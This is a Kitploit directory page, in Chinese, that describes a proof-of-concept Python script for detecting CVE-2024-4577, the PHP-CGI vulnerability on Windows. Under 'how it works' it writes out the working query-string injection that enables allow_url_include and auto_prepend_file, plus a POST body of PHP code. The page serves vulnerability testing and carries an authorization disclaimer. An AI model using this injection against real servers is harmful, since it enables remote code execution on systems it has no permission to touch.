Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2024-4577 — 用于通过查询字符串注入和POST有效负载测试CVE-2024-4577 PHP CGI漏洞的Python PoC脚本,以确定服务器易受攻击性。 | Kitploit
工具/GitHubGitHub/kimjuhyeong95/cve-2024-4577
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubkimjuhyeong95/cve-2024-4577

cve-2024-4577

用于通过查询字符串注入和POST有效负载测试CVE-2024-4577 PHP CGI漏洞的Python PoC脚本,以确定服务器易受攻击性。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-4577 漏洞测试脚本

这个 Python 脚本是一个简单的 PoC (概念验证) 工具,用于检测 PHP 的最新漏洞 CVE-2024-4577。

⚠️ 本工具仅供安全诊断目的使用,并且仅可用于您自己拥有的系统或事先获得授权的目标。


📌 概述

该漏洞存在于 PHP 在 Windows 环境下以 CGI 模式运行时,能够通过多字节字符绕过注入任意 PHP 配置并导致代码执行的问题。

本脚本通过向目标 URL 发送基于查询字符串的绕过载荷和 PHP 代码的 POST 请求,判断是否存在漏洞。


✅ 使用方法

1. 确认 Python 已安装

root@kitploit:~
python3 --version

2. 安装依赖包

root@kitploit:~
pip install requests

3. 运行脚本

root@kitploit:~
python3 cve_2024_4577_test.py

4. 输入目标 URL

示例输入:

root@kitploit:~
http://192.168.0.10/index.php

或者仅输入根路径也会自动处理

root@kitploit:~
http://192.168.0.10

🔍 结果说明

  • ✅ [✅] 취약: 서버가 PHP 코드를 실행했습니다.
    → 该服务器存在漏洞。

  • ✔️ [✔️] 비취약 또는 차단됨
    → 收到了响应,但未触发漏洞。

  • ❌ [❌] 요청 실패: ...
    → 因连接错误、超时等导致测试失败。


💡 工作原理

  • 注入漏洞绕过字符串:

    root@kitploit:~
    ?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
    
  • POST 正文中注入 PHP 代码:

    root@kitploit:~
    <?php echo 'CVE-2024-4577-TEST'; ?>
    
  • 如果服务器执行了此代码,响应中会包含该字符串,从而可以判断。


⚠️ 免责声明

本脚本仅供教育和安全研究目的使用,扫描或测试未经授权的系统是非法的。使用者需自行承担所有责任。


📂 文件结构

文件名描述
cve_2024_4577_test.py用于漏洞测试的 Python 脚本
README.md使用说明文档(本文件)
LICENSE.txt

📫 联系

如有 bug 报告或建议,请通过 email 或 PR 提交。

📝 License

This project is licensed under the MIT License - see the LICENSE file for details. Copyright (c) 2025 KimJuhyeong95

下载工具